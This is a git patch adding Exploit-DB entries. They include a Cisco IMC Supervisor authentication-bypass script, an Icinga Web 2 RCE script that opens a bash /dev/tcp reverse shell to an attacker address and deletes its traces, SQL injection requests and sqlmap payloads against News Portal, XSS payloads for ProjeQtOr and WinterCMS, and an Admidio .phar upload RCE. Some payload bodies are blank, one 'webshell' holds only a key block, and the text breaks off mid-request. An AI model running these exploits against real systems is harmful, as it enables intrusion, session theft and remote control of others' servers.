From fd788a92e392137b89b99805da8d6cdda5722e03 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sun, 16 Jul 2023 00:16:39 +0000 Subject: [PATCH] DB: 2023-07-16 9 changes to exploits/shellcodes/ghdb Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) Admidio v4.2.10 - Remote Code Execution (RCE) Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR) Bus Pass Management System 1.0 - 'viewid' SQL Injection Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR) Bus Pass Management System 1.0 - 'viewid' SQL Injection Icinga Web 2.10 - Authenticated Remote Code Execution News Portal v4.0 - SQL Injection (Unauthorized) Pluck v4.7.18 - Remote Code Execution (RCE) ProjeQtOr Project Management System v10.4.1 - Multiple XSS WinterCMS < 1.2.3 - Persistent Cross-Site Scripting XAMPP 8.2.4 - Unquoted Path --- exploits/hardware/webapps/51589.txt | 64 ++++++++ exploits/php/webapps/51586.py | 153 ++++++++++++++++++ exploits/php/webapps/51587.txt | 234 ++++++++++++++++++++++++++++ exploits/php/webapps/51588.txt | 67 ++++++++ exploits/php/webapps/51590.txt | 59 +++++++ exploits/php/webapps/51591.txt | 64 ++++++++ exploits/php/webapps/51592.py | 57 +++++++ exploits/windows/local/51585.txt | 59 +++++++ files_exploits.csv | 14 +- 9 files changed, 768 insertions(+), 3 deletions(-) create mode 100644 exploits/hardware/webapps/51589.txt create mode 100755 exploits/php/webapps/51586.py create mode 100644 exploits/php/webapps/51587.txt create mode 100644 exploits/php/webapps/51588.txt create mode 100644 exploits/php/webapps/51590.txt create mode 100644 exploits/php/webapps/51591.txt create mode 100755 exploits/php/webapps/51592.py create mode 100644 exploits/windows/local/51585.txt diff --git a/exploits/hardware/webapps/51589.txt b/exploits/hardware/webapps/51589.txt new file mode 100644 index 000000000..948c6d9d3 --- /dev/null +++ b/exploits/hardware/webapps/51589.txt @@ -0,0 +1,64 @@ +[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass +[+] Cisco IMC Supervisor - < 2.2.1.0 +[+] Date: 08/21/2019 +[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo +[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html +[+] Vulnerability Discovery : Pedro Ribeiro +[+] Exploit Author: Fatih Sencer +[+] CVE: CVE-2019-1937 +---------------------------------------------------- + +Usage: + +./python3 CiscoIMC-Bypass.py -u host + +[+] Target https://xxxxxx.com +[+] Target OK +[+] Exploit Succes +[+] Login name : admin +[+] Cookie : REACTED + +""" + +import argparse,requests,warnings,base64,json,random,string +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +warnings.simplefilter('ignore',InsecureRequestWarning) + + +def init(): + parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass') + parser.add_argument('-u','--host',help='Host', type=str, required=True) + args = parser.parse_args() + exploit(args) + +def exploit(args): + session = requests.Session() + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)", + "X-Requested-With": "XMLHttpRequest", + "Referer": "https://{}/".format(args.host), + "X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)), + "X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)) + } + target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host) + print("[+] Target {}".format(args.host)) + + exp_send = session.get(target, headers=headers, verify=False, timeout=10) + + if exp_send.status_code == 200: + print("[+] Target OK") + body_data = json.loads(exp_send.text) + if not (body_data.get('loginName') is None): + print("[+] Exploit Succes") + print("[+] Login name : {}".format(body_data.get('loginName'))) + print("[+] Cookie : {}".format(session.cookies.get_dict())) + else: + print("[-] Exploit Failed") + + else: + print("[-] N/A") + exit() + +if __name__ == "__main__": + init() \ No newline at end of file diff --git a/exploits/php/webapps/51586.py b/exploits/php/webapps/51586.py new file mode 100755 index 000000000..5462a2341 --- /dev/null +++ b/exploits/php/webapps/51586.py @@ -0,0 +1,153 @@ +#!/usr/bin/env python3 + +# Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution +# Date: 8/07/2023 +# Exploit Author: Dante Corona(Aka. cxdxnt) +# Software Link: https://github.com/Icinga/icingaweb2 +# Vendor Homepage: https://icinga.com/ +# Software Link: https://github.com/Icinga/icingaweb2 +# Version: <2.8.6, <2.9.6, <2.10 +# Tested on: Icinga Web 2 Version 2.9.2 on Linux +# CVE: CVE-2022-24715 +# Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715 + +import requests,argparse,re,random,string +from colorama import Fore,Style + +def letter_random(): + letras = string.ascii_lowercase + character_random = random.choices(letras, k=6) + return ''.join(character_random) + + +def users_url_password(): + parser = argparse.ArgumentParser(description='Descripción de tu programa.') + parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima') + parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user') + parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password') + parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP') + parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT') + args = parser.parse_args() + url = args.url + user = args.user + password=args.password + ip_attack = args.ip + port_attack = args.port + + return url,user,password,ip_attack,port_attack + +def login(url,user,password): + try: + login_url = url + "/icingaweb2/authentication/login" + session = requests.Session() + r = session.get(login_url) + csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0] + data_post = {"username":user, + "password":password, + "CSRFToken":csrf_regex, + "formUID":"form_login", + "btn_submit":"Login" + } + response = session.post(login_url,data=data_post) + if "Welcome to Icinga Web!" in response.text: + print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.") + r = session.get(login_url) + else: + print("[!]Failed to login.") + exit(1) + #return session,csrf_regex + except requests.exceptions.InvalidURL: + print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(") + exit(1) + return session,csrf_regex + +def upload_file(session,url,character_random,csrf_regex): + webshell = f"""-----BEGIN RSA PRIVATE KEY----- +MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu +KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm +o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k +TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7 +9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy +v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs +/5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00 +-----END RSA PRIVATE KEY----- + +"""%character_random + upload_url = url + "/icingaweb2/config/createresource" + r = session.get(upload_url) + csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0] + data_post ={"type":"ssh", + "name":"shm/"+character_random, + "user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php", + "private_key":webshell, + "formUID":"form_config_resource", + "CSRFToken":csrf, + "btn_submit":"Save Changes" + } + upload_response = session.post(upload_url,data=data_post) + check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php") + if check.status_code != 200 : + print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(") + exit(1) + else: + print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.") + +def enable_module(session,url,character_random): + url_module = url+"/icingaweb2/config/general" + r_module = session.get(url_module) + csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0] + data_post = {"global_show_stacktraces":"0", + "global_show_stacktraces":"1", + "global_show_application_state_messages":"0", + "global_show_application_state_messages":"1", + "global_module_path":"/dev/shm/", + "global_config_resource":"icingaweb2", + "logging_log":"none", + "themes_default":"Icinga", + "themes_disabled":"0", + "authentication_default_domain":"", + "formUID":"form_config_general", + "CSRFToken":f"{csrf_module}", + "btn_submit":"Save Changes" + } + + resul = session.post(url_module,data_post) + #-------------------------------------------------- + url_enable = url +"/icingaweb2/config/moduleenable" + r_enable = session.get(url_enable) + csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0] + data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"} + resul_enable = session.post(url_enable,data_enable) + + +def reverse_shell(session,url,ip_attack,port_attack,character_random): + reverse_url = url + "/icingaweb2/dashboard" + reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}' + reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &" + reverse_response_one = session.get(reverse_exe_one) + try: + reverse_response_two = session.get(reverse_exe_two, timeout=5) + except: + print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence") + + remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}") + disable_url = url + "/icingaweb2/config/moduledisable" + r_disable = session.get(disable_url) + csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0] + data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"} + response_disable = session.post(disable_url,data=data_disable) + + + +def disable_module(session,url,character_random): + url_disable = url + "/icingaweb2/config/moduledisable" + + + +if __name__ == '__main__': + character_random = letter_random() + url,user,password,ip_attack,port_attack = users_url_password() + session,csrf_regex = login(url,user,password) + upload_file(session,url,character_random,csrf_regex) + enable_module(session,url,character_random) + reverse_shell(session,url,ip_attack,port_attack,character_random) \ No newline at end of file diff --git a/exploits/php/webapps/51587.txt b/exploits/php/webapps/51587.txt new file mode 100644 index 000000000..2f0eb7e41 --- /dev/null +++ b/exploits/php/webapps/51587.txt @@ -0,0 +1,234 @@ +# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized) +# Date: 09/07/2023 +# Exploit Author: Hubert Wojciechowski +# Contact Author: hub.woj12345@gmail.com +# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c +# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643 +# Version: 4.0 +# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314 +# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 + +## Example 1 +----------------------------------------------------------------------------------------------------------------------- +Param: name, email, comment +----------------------------------------------------------------------------------------------------------------------- +Req +----------------------------------------------------------------------------------------------------------------------- +POST /newsportal/news-details.php?nid=13 HTTP/1.1 +Origin: http://127.0.0.1 +Sec-Fetch-User: ?1 +Host: 127.0.0.1:80 +Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 +Accept-Encoding: gzip, deflate +Sec-Fetch-Site: same-origin +sec-ch-ua-mobile: ?0 +Content-Length: 277 +Sec-Fetch-Mode: navigate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Connection: close +Referer: http://127.0.0.1/newsportal/news-details.php?nid=13 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +sec-ch-ua-platform: "Windows" +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" +Sec-Fetch-Dest: document + +csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit +----------------------------------------------------------------------------------------------------------------------- +Res: +----------------------------------------------------------------------------------------------------------------------- +HTTP/1.1 200 OK +Date: Sun, 09 Jul 2023 10:55:26 GMT +Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 +X-Powered-By: PHP/8.1.17 +Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 146161 + + + + + + + + + + + + + News Portal | Home Page + [...] + +----------------------------------------------------------------------------------------------------------------------- +Req +----------------------------------------------------------------------------------------------------------------------- +POST /newsportal/news-details.php?nid=13 HTTP/1.1 +Origin: http://127.0.0.1 +Sec-Fetch-User: ?1 +Host: 127.0.0.1:80 +Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 +Accept-Encoding: gzip, deflate +Sec-Fetch-Site: same-origin +sec-ch-ua-mobile: ?0 +Content-Length: 276 +Sec-Fetch-Mode: navigate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Connection: close +Referer: http://127.0.0.1/newsportal/news-details.php?nid=13 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +sec-ch-ua-platform: "Windows" +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" +Sec-Fetch-Dest: document + +csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit +----------------------------------------------------------------------------------------------------------------------- +Res: +----------------------------------------------------------------------------------------------------------------------- +HTTP/1.1 200 OK +Date: Sun, 09 Jul 2023 10:56:06 GMT +Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 +X-Powered-By: PHP/8.1.17 +Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 525 +Connection: close +Content-Type: text/html; charset=UTF-8 + +<br /> +<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21 +Stack trace: +#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...') +#1 {main} + thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w +----------------------------------------------------------------------------------------------------------------------- +SQLMap example param 'comment': +----------------------------------------------------------------------------------------------------------------------- +sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests: +--- +Parameter: #2* ((custom) POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit= + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit= +--- +web application technology: PHP 8.1.17, Apache 2.4.56 +bacck-end DBMS: MySQL >= 5.0 (MariaDB fork) + +## Example 2 - login to administration panel +----------------------------------------------------------------------------------------------------------------------- +Param: username +----------------------------------------------------------------------------------------------------------------------- +Req +----------------------------------------------------------------------------------------------------------------------- +POST /newsportal/admin/ HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 42 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://127.0.0.1/newsportal/admin/ +Accept-Encoding: gzip, deflate +Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8 +Connection: close + +username=admin'&password=Test%40123&login= +----------------------------------------------------------------------------------------------------------------------- +Res: +----------------------------------------------------------------------------------------------------------------------- +HTTP/1.1 200 OK +Date: Sun, 09 Jul 2023 11:00:53 GMT +Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 +X-Powered-By: PHP/8.1.17 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 505 +Connection: close +Content-Type: text/html; charset=UTF-8 + +<br /> +<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13 +Stack trace: +#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...') +#1 {main} + thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br /> +----------------------------------------------------------------------------------------------------------------------- +Req +----------------------------------------------------------------------------------------------------------------------- +POST /newsportal/admin/ HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 43 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://127.0.0.1/newsportal/admin/ +Accept-Encoding: gzip, deflate +Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8 +Connection: close + +username=admin''&password=Test%40123&login= +----------------------------------------------------------------------------------------------------------------------- +Res: +----------------------------------------------------------------------------------------------------------------------- +HTTP/1.1 200 OK +Date: Sun, 09 Jul 2023 11:02:15 GMT +Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 +X-Powered-By: PHP/8.1.17 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 4733 +Connection: close +Content-Type: text/html; charset=UTF-8 + +<script>alert('Invalid Details');</script> +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8"> + <meta name="viewport" content="width=device-width, initial-scale=1.0"> + <meta name="description" content="News Portal."> + <meta name="author" content="PHPGurukul"> + + + <!-- App title --> + <title>News Portal | Admin Panel +[...] \ No newline at end of file diff --git a/exploits/php/webapps/51588.txt b/exploits/php/webapps/51588.txt new file mode 100644 index 000000000..137e7c880 --- /dev/null +++ b/exploits/php/webapps/51588.txt @@ -0,0 +1,67 @@ +Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS +Version: V10.4.1 +Bugs: Multiple XSS +Technology: PHP +Vendor URL: https://www.projeqtor.org +Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download +Date of found: 09.07.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC + + ### XSS-1 ### + + +visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken= +payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E + + ### XSS-2 ### + +steps: + +1. login to account +2. go projects and create project +3.add attachment +3. upload svg file + +""" + + + + + + + +""" +4. Go to svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg ) + + + ### XSS-3 ### + +Go to below adress (post request) + +POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1 +Host: localhost +Content-Length: 35 +sec-ch-ua: +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +sec-ch-ua-platform: "" +Accept: */* +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/projeqtor/view/main.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3 +Connection: close + +resultAck= \ No newline at end of file diff --git a/exploits/php/webapps/51590.txt b/exploits/php/webapps/51590.txt new file mode 100644 index 000000000..e12f34ec2 --- /dev/null +++ b/exploits/php/webapps/51590.txt @@ -0,0 +1,59 @@ +Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE) +Application: Admidio +Version: 4.2.10 +Bugs: RCE +Technology: PHP +Vendor URL: https://www.admidio.org/ +Software Link: https://www.admidio.org/download.php +Date of found: 10.07.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +Steps: + +1. Login to account +2. Go to Announcements +3. Add Entry +4. Upload .phar file in image upload section. +.phar file Content + +5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar ) + +Request: + +POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1 +Host: localhost +Content-Length: 378 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: iframe +Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB +Connection: close + +------WebKitFormBoundaryne9TRuC1tAqhR86r +Content-Disposition: form-data; name="upload"; filename="shell.phar" +Content-Type: application/octet-stream + + + +------WebKitFormBoundaryne9TRuC1tAqhR86r +Content-Disposition: form-data; name="ckCsrfToken" + +o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB +------WebKitFormBoundaryne9TRuC1tAqhR86r-- \ No newline at end of file diff --git a/exploits/php/webapps/51591.txt b/exploits/php/webapps/51591.txt new file mode 100644 index 000000000..26a08f56d --- /dev/null +++ b/exploits/php/webapps/51591.txt @@ -0,0 +1,64 @@ +# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting +# Exploit Author: abhishek morla +# Google Dork: N/A +# Date: 2023-07-10 +# Vendor Homepage: https://wintercms.com/ +# Software Link: https://github.com/wintercms/winter +# Version: 1.2.2 +# Tested on: windows64bit / mozila firefox +# CVE : CVE-2023-37269 +# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3 +# Video POC : https://youtu.be/Dqhq8rdrcqc + +Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality + +Description : +WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script + +Payload:- +// image.svg + + + + + + + +//Post Request + +POST /backend/system/settings/update/winter/backend/branding HTTP/1.1 +Host: 172.17.0.2 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: application/json +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cache-Control: no-cache +X-Requested-With: XMLHttpRequest +X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2 +X-WINTER-REQUEST-HANDLER: formLogo::onUpload +Content-Type: multipart/form-data; 